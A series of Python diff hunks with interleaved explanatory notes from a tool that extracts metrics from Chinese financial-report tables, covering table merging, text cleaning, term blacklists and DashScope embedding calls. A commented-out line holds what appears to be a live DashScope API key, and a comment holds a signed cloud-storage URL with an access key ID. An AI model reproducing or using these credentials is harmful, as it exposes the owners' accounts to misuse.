                # can be folded into the previous table
                merged_objects.append(info_obj)
                data = info_obj['data']
                if not data:
                    continue
                first_row = data[0]
                if all(re.search(r'[\u4e00-\u9fa5]', cell) for cell in first_row[1:]) and len(temp_list) == 0:
                    temp_list.append(info_obj)
                elif all(re.search(r'[\u4e00-\u9fa5]', cell) for cell in first_row[1:]) and len(temp_list) > 0:
                    merged_objects.append(temp_list)
                    temp_list = []
                    temp_list.append(info_obj)
                elif not all(re.search(r'[\u4e00-\u9fa5]', cell) for cell in first_row[1:]) and len(temp_list) > 0:
                    temp_data = temp_list[-1]['data']
                    temp_data = list(temp_data)
                    for row in list(info_obj['data']):
                        temp_data.append(row)
                    info_obj['data'] = temp_data
                    temp_list.clear()
                    temp_list.append(info_obj)

        except Exception as e:
            applog.error(f"解析数据错误: {e}")

    if temp_list:
        merged_objects.append(temp_list)

    return merged_objects

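A quick illustration of the merging rule: a table whose first row, past the first cell, contains no Chinese text is treated as a continuation of the previous table, and its rows are carried forward as one merged table (a sketch; the sample data is made up):

    tables = [
        {'type': 'table', 'index': 1, 'data': [['项目', '期末'], ['货币资金', '100']]},
        {'type': 'table', 'index': 2, 'data': [['200', '300']]},  # headerless -> continuation
    ]
    merged = merge_consecutive_arrays(tables)
    # The fragment's rows are appended after the previous table's rows.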

def merge_consecutive_arrays_v1(pdf_info):
@ -775,11 +798,10 @@ def start_table_measure_job(file_id):
    records_range_parts = utils.get_range(len(word_tables),MEASURE_COUNT)
    processes = []
    for record_range in records_range_parts:
        # get_table_measure(file_id,word_tables,record_range,)
        p = Process(target=get_table_measure, args=(file_id,word_tables,record_range,))
        processes.append(p)
        p.start()

    for p in processes:
        p.join()

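Spawning one Process per record range can oversubscribe the machine on documents with many tables. A bounded alternative with the same fan-out, sketched with multiprocessing.Pool (get_table_measure must be importable at module level for this to work on Windows; the worker count is an assumption):

    from multiprocessing import Pool

    def start_table_measure_job_pooled(file_id, word_tables, ranges, workers=4):
        # starmap blocks until every range has been processed
        with Pool(processes=workers) as pool:
            pool.starmap(get_table_measure,
                         [(file_id, word_tables, r) for r in ranges])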
@ -252,8 +252,8 @@ def append_to_file(file_path, text):

if __name__ == "__main__":
    current_directory = os.getcwd()
    docx_relative_path = 'file/docx/101.docx'
    file_relative_path = 'file/docx/test1.txt'
    docx_relative_path = '..\\file\\docx\\101.docx'
    file_relative_path = '..\\file\\docx\\test1.txt'
    docx_path = os.path.join(current_directory, docx_relative_path)
    file_path = os.path.join(current_directory, file_relative_path)
    try:
@ -1,22 +1,20 @@
from http import HTTPStatus
import dashscope
#
# dashscope.api_key='sk-2d6352a4c9b142f58b75cd9c8222bd91'
# messages = [{'role': 'system', 'content': 'You are a helpful assistant.'},
#             {'role': 'user', 'content': '如何做西红柿鸡蛋?'}]
#
# response = dashscope.Generation.call(
#     model='qwen-turbo',
#     messages=messages,
#     result_format='message',  # set the result to be "message" format.
# )
#
# if response.status_code == HTTPStatus.OK:
#     print(response)
# else:
#     print('Request id: %s, Status code: %s, error code: %s, error message: %s' % (
#         response.request_id, response.status_code,
#         response.code, response.message
#     ))
from dashscope import BatchTextEmbedding
import requests

print("sdas00"*2)  # leftover debug print
def call():
    result = BatchTextEmbedding.call(BatchTextEmbedding.Models.text_embedding_async_v1,
                                     url="https://modelscope.oss-cn-beijing.aliyuncs.com/resource/text_embedding_file.txt",
                                     # url='http://127.0.0.1:text_embedding_file.txt'
                                     text_type="document")
    url = result.output.url
    response = requests.get(url)

    # Check whether the download succeeded
    if response.status_code == 200:
        # Grab the body of the result file
        html_content = response.text
        print(html_content)


if __name__ == '__main__':
    call()
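call() assumes both the batch job and the follow-up download succeed. A variant with the status handling the commented Generation example already demonstrates, assuming the batch response exposes status_code the way other dashscope responses do:

    def call_checked():
        result = BatchTextEmbedding.call(
            BatchTextEmbedding.Models.text_embedding_async_v1,
            url="https://modelscope.oss-cn-beijing.aliyuncs.com/resource/text_embedding_file.txt",
            text_type="document")
        if result.status_code != HTTPStatus.OK:
            print(f'embedding job failed: {result.status_code}')
            return None
        response = requests.get(result.output.url)
        response.raise_for_status()  # surface download errors instead of printing blindly
        return response.text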
@ -7,9 +7,14 @@ import json
from datetime import datetime
import re,os,time
import requests
import config
import numpy as np
from docx2pdf import convert
from config import api_key


dashscope.api_key = api_key


def get_md5(str):
    import hashlib
@ -53,8 +58,7 @@ def get_clean_text(text):
    #terms_3 = ["固定资产","短期借款","合同负债","在建工程","商誉"]
    # Terms like 同比 (year-over-year) must not appear
    terms_4 = ['比', '率', '占','至','年以内','年以上','年内','1-2年','2-3年','3-4年','4-5年','准备','在途','增值','评估','利息','应计','改良','跌价','补助','投资']
    dates = [ "2021年12月31日","2022年12月31日","2022年1月1日","2023年1月1日", "2023年12月31日",
        "2022年6月30日","2023年6月30日","2024年6月30日","2024年半年度","2023年半年度","2022年半年度"]
    dates = [ "2021年12月31日","2022年12月31日","2022年1月1日","2023年1月1日", "2023年12月31日", "2022年6月30日","2023年6月30日","2024年6月30日","2024年半年度","2023年半年度","2022年半年度"]
    #dates = [ "2021年12月31日","2022年12月31日","2023年12月31日","2022年1月1日","2023年1月1日", "2024年1月1日", "2022年6月30日","2023年6月30日","2024年6月30日","2021年初","2022年初","2023年初","2024年初",'2021年末','2022年末','2023年末','2024年末',"2023年","2022年","2021年"]
    if any(term in text for term in terms_4):
        return text

@ -90,7 +94,7 @@ def get_clean_text(text):
        return pattern.sub(lambda match: replacements[match.group(0)], text)
    text = replace_all(text, replacement_dict)
    # Strip a bare 12月31日 that appears without a year prefix
    pattern_year = r'(?<!2023年|2022年|2021年)12月31日'
    pattern_year = r'(?<!2026年|2025年|2024年|2023年|2022年|2021年)12月31日'
    text = re.sub(pattern_year, '', text)

    pattern = r"\([^)]*\)|\([^)]*\)"  # also match ASCII parentheses
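The widened lookbehind above strips a bare 12月31日 only when none of the listed years precedes it; every alternative is the same five characters wide, which Python's fixed-width lookbehind requires. A quick check of the behavior:

    import re
    pattern_year = r'(?<!2026年|2025年|2024年|2023年|2022年|2021年)12月31日'
    print(re.sub(pattern_year, '', '报告期末12月31日余额'))  # -> 报告期末余额
    print(re.sub(pattern_year, '', '2024年12月31日余额'))    # unchanged: year prefix present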
@ -111,7 +115,7 @@ def get_clean_text(text):
        "三": "",
        "年内到期":"年内到期",
        "1-6月":"",
        "发行新股":"发行新股",
        "发行新股":"发行新股",
    }
    # Inspect the bracketed parts of the text
    for match in matches:
@ -129,6 +133,21 @@ def get_clean_text(text):
    text = re.sub(r"[^\w\s]", "", text)
    return text

def convert_docx_to_pdf(file_path):
    # Only .docx files are accepted
    if file_path.lower().endswith('.docx'):
        # Build the PDF output path
        pdf_path = os.path.splitext(file_path)[0] + '.pdf'

        try:
            # Run the conversion
            convert(file_path, pdf_path)
            print(f"转换成功: {pdf_path}")
        except Exception as e:
            print(f"转换失败: {e}")
    else:
        print("错误: 文件必须是 .docx 格式。")

def save_pdf_from_url(url, file_path):
    from urllib.parse import unquote
    # Issue a GET request and save the file
@ -142,9 +161,10 @@ def save_pdf_from_url(url, file_path):
    # Extract the file name from the processed URL
    # Extract the file name
    file_name = url_without_params.split('/')[-1]

    #https://financial-report-test.obs.cn-east-3.myhuaweicloud.com:443/upload/file/909f3dd3337a4dd4bc24fb4748c6c76e.PDF?AccessKeyId=IIDIMIUZ1UBBVPKIVB4W&Expires=1726798358&Signature=fKgrDPjmd99Nje4wwvBJxmFlXZY%3D
    # Local path where the file is saved
    local_file_path = file_path + file_name
    # local_file_path = convert_docx_to_pdf(local_file_path)

    with open(local_file_path, 'wb') as file:
        file.write(response.content)
@ -279,20 +299,39 @@ def check_black_list(meta_measure, pdf_measure, black_array):
def check_black_list_old(meta_measure,pdf_measure):
    # Reject the candidate when its name contains a term blacklisted for this metric
    #black_array = ['非经常性损益:非经常性损益合计,非经常性损益总额','营业收入:营业外收入,主营业务,营业总收入,扣除,年度公司','归母净利润:净资产,净利率,扣除,年度公司','扣非净利润:净资产,净利率,年度公司','经营活动现金流净额:筹资活动,投资活动,流入小计,流出小计','筹资活动现金流净额:经营活动,投资活动,流入小计,流出小计','投资活动现金流净额:经营活动,筹资活动,流入小计,流出小计','非经常性损益:扣除非经常性损益','基本每股收益:稀释每股收益','稀释每股收益:基本每股收益','总资产:净资产','应收账款:应付账款','短期借款:长期借款','应付账款:应收账款','长期借款:短期借款','研发投入:比例,比率,占比,费用','资本化研发投入:比例,比率,占比,费用','资本化研发投入占比:金额,费用','研发投入占营业收入比例:金额,费用','上年年末:1月1日']
    black_array = ['非经常性损益:非经常性损益合计,非经常性损益总额,合计','营业收入:营业外收入,主营业务,营业总收入,扣除,年底公司,合计,汇总'
        ,'归母净利润:净资产,净利率,扣除,年度公司,归属于本公司普通股股东的净利润','扣非净利润:净资产,净利率,年度公司'
        ,'经营活动现金流净额:筹资活动,投资活动,流入小计,流出小计,每股,扣除','筹资活动现金流净额:经营活动,投资活动,流入小计,流出小计,每股,扣除'
        ,'投资活动现金流净额:经营活动,筹资活动,流入小计,流出小计,每股,扣除','非经常性损益:扣除非经常性损益'
        ,'基本每股收益:稀释每股收益,发行新股','稀释每股收益:基本每股收益,发行新股','总资产:净资产','应收账款:应付账款,年以上,内,至,到'
        ,'短期借款:长期借款,非流动负债,年以上,年以内,内,至,到','应付账款:应收账款,年以上,内,至,到','长期借款:短期借款,非流动负债,年以上,内,至,到,保证,抵押','研发投入:比例,比率,占比,费用,占'
        ,'资本化研发投入:比例,比率,占比,费用,占','资本化研发投入占比:金额,费用','研发投入占营业收入比例:金额,费用'
        ,'上年年末:1月1日','期加权平均净资产收益率:同比,扣除,扣非,年化,每股'
    black_array = ['非经常性损益:非经常性损益合计,非经常性损益总额,合计'
        ,'营业收入:营业外收入,主营业务,营业总收入,扣除,年底公司,合计,汇总'
        ,'归母净利润:净资产,净利率,扣除,年度公司,归属于本公司普通股股东的净利润'
        ,'扣非净利润:净资产,净利率,年度公司'
        ,'经营活动现金流净额:筹资活动,投资活动,流入小计,流出小计,每股,扣除'
        ,'筹资活动现金流净额:经营活动,投资活动,流入小计,流出小计,每股,扣除'
        ,'投资活动现金流净额:经营活动,筹资活动,流入小计,流出小计,每股,扣除'
        ,'非经常性损益:扣除非经常性损益'
        ,'基本每股收益:稀释每股收益,发行新股'
        ,'稀释每股收益:基本每股收益,发行新股'
        ,'总资产:净资产','应收账款:应付账款,年以上,内,至,到'
        ,'短期借款:长期借款,非流动负债,年以上,年以内,内,至,到'
        ,'应付账款:应收账款,年以上,内,至,到'
        ,'长期借款:短期借款,非流动负债,年以上,内,至,到,保证,抵押'
        ,'研发投入:比例,比率,占比,费用,占'
        ,'资本化研发投入:比例,比率,占比,费用,占'
        ,'资本化研发投入占比:金额,费用'
        ,'研发投入占营业收入比例:金额,费用'
        ,'上年年末:1月1日'
        ,'期加权平均净资产收益率:同比,扣除,扣非,年化,每股'
        ,'期扣非加权平均净资产收益率:同比,年化,每股'
        ,'加权平均净资产收益率同比变动:年化,每股'
        ,'研发费用:制造,投入,直接,管理','应收账款:1-2年','货币资金:在途'
        ,'当期:2023年1-6月,调整后','营业成本:营业总成本','长期借债:年内到期','研发投入:直接'
        ,'第一季度:第二季度,第三季度,第四季度','第二季度:第一季度,第三季度,第四季度','第三季度:第二季度,第一季度,第四季度','第四季度:第二季度,第三季度,第一季度'
        ,'研发费用:研发支出,研发投入','存货:跌价准备','费用:日常,付现','固定资产:改良,补助,投资']
        ,'研发费用:制造,投入,直接,管理'
        ,'应收账款:1-2年','货币资金:在途'
        ,'当期:2023年1-6月,调整后'
        ,'营业成本:营业总成本'
        ,'长期借债:年内到期','研发投入:直接'
        ,'第一季度:第二季度,第三季度,第四季度'
        ,'第二季度:第一季度,第三季度,第四季度'
        ,'第三季度:第二季度,第一季度,第四季度'
        ,'第四季度:第二季度,第三季度,第一季度'
        ,'研发费用:研发支出,研发投入','存货:跌价准备'
        ,'费用:日常,付现','固定资产:改良,补助,投资']
    # current_period = f'当期:{report_year}年1-6月'
    # black_array.append(current_period)
    for black in black_array:
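Each black_array entry packs a rule into the form 'meta_measure:term1,term2,...': when the metric name contains the part before the colon, any candidate containing one of the comma-separated terms is rejected. Reading one rule by hand (sample strings only):

    rule = '短期借款:长期借款,非流动负债,年以上,年以内,内,至,到'
    black_meta, black_pdfs = rule.split(':')[0], rule.split(':')[1].split(',')
    pdf_measure = '一年以上的长期借款'
    print(any(pdf in pdf_measure for pdf in black_pdfs))  # True -> blacklisted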
@ -303,12 +342,13 @@ def check_black_list_old(meta_measure,pdf_measure):
            if pdf_measure.find(pdf) >= 0:
                return True
    return False

def check_white_list(meta_measure,pdf_measure):
    white_array = ['基本每股收益:每股收益', '加权平均净资产收益率同比变动:比', '季度变动比例:比', '加权平均净资产收益率:比']
    white_array = ['基本每股收益:每股收益','加权平均净资产收益率同比变动:比','季度变动比例:比']
    for black in white_array:
        black_meta = black.split(':')[0]
        black_pdfs = black.split(':')[1].split(',')
        if meta_measure.find(black_meta) >= 0:
        if black_meta in meta_measure:
            for pdf in black_pdfs:
                if pdf_measure.find(pdf) < 0:
                    return True
@ -384,7 +424,7 @@ def check_table_title_black_list_measure(text):
    #black_array = ['补充资料:研发费用,管理费用,财务费用'
    #    ,'营业收入:营业外收入,主营业务,营业总收入,扣除,年底公司,合计,汇总'
    #]
    table_title_black_list = """补充资料|测试文本|其他非流动负债|应收款项融资|本期计提、收回或转回的坏账准备情况|筹资活动产生的各项负债变动情况|持有待售资产|账龄超过 1 年或逾期的重要应付账款|经营租赁资产"""
    table_title_black_list = """补充资料|测试文本|其他非流动负债|应收款项融资|本期计提、收回或转回的坏账准备情况|筹资活动产生的各项负债变动情况|持有待售资产|账龄超过 1 年或逾期的重要应付账款|经营租赁资产|计息金融工具|坏账准备"""
    if len(re.findall(table_title_black_list, text)) > 0:
        return True
    return False
@ -493,6 +533,8 @@ def check_pdf_measure_black_list_v3(file_id,table_num,table_index,pdf_measure,co
        ,'持有待售资产:固定资产'
        ,'账龄超过 1 年或逾期的重要应付账款:应付账款'
        ,'经营租赁资产:固定资产'
        ,'计息金融工具:货币资金,短期借款,交易性金融资产'
        ,'坏账准备:应收账款'
    ]
    for black in black_array:
        black_meta = black.split(':')[0]
@ -514,6 +556,7 @@ def check_black_table_list(data):
        black_meta = black.split(':')[0]
        black_pdfs = black.split(':')[1].split(',')
        if any(black_meta in cell for row in data for cell in row):
            print(data)
            for pdf in black_pdfs:
                data = [row for row in data if not any(pdf in cell for cell in row)]
    return data
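check_black_table_list drops whole rows: once the meta term shows up anywhere in the table, every row containing one of its blacklisted terms is filtered out. A small illustration with a single hypothetical rule '坏账准备:应收账款':

    data = [['坏账准备', '100'], ['应收账款', '200'], ['合计', '300']]
    for pdf in ['应收账款']:
        data = [row for row in data if not any(pdf in cell for cell in row)]
    print(data)  # [['坏账准备', '100'], ['合计', '300']]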